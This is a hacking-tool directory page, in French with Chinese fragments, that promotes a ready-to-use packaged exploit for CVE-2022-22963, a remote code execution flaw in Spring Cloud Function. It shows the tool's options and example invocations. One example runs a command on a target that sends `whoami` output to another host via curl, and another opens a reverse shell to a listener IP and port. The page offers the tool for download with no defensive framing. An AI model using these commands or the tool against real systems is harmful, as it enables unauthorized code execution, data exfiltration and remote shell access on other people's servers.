Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-22963 — spring cloud function 一键利用工具!作者 charis 博客 https://charis3306.top/ | Kitploit
Outils/GitHubGitHub/charis3306/cve-2022-22963
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubcharis3306/cve-2022-22963

CVE-2022-22963

spring cloud function 一键利用工具!作者 charis 博客 https://charis3306.top/

Voir le dépôt
81il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-22963 (spring cloud function sple rce)

Outil d'exploitation en un clic pour spring cloud function! par charis

Blog https://charis3306.top/

Déjà empaqueté en fichier exe, prêt à l'emploi

Thème de commande

root@kitploit:~
usage: Spring-cloud-function-spel0.2.exe [-h] --check CHECK [--route ROUTE] --url URL [--ip IP] [--port PORT] [--proxies PROXIES] [--cmd CMD]

spring cloud function 一键利用工具! by charis 博客https://charis3306.top/

options:
  -h, --help         show this help message and exit
  --check CHECK      检测方式post或get方式,--check get --check post
  --route ROUTE      检测路由,默认是functionRouter
  --url URL          输入利用的url
  --ip IP            反弹shell地址ip
  --port PORT        反弹shell地址端口
  --proxies PROXIES  启用代理
  --cmd CMD          要执行的命令

--check est obligatoire

Thème d'aide utilisé

root@kitploit:~
Spring-cloud-function-spel0.2.exe --help

image

La détection par défaut --check est obligatoire, --route est la route où la vulnérabilité existe. Attention, sans utiliser dnslog ou sleep pour la détection, il peut y avoir des faux positifs !

root@kitploit:~
Spring-cloud-function-spel0.2.exe --check post --url http://www.charis3306.top

image

Exécuter la commande pour vérifier si elle peut être exploitée
root@kitploit:~
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --cmd "curl http://192.168.1.3:8080/`whoami`"

image

Reverse shell
root@kitploit:~
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --ip 192.168.1.3 --port 9999

image

Si vous trouvez cela bien, s'il vous plaît donnez-moi une star

Problèmes : issues ou contactez-moi par email [email protected]

Télécharger l’outil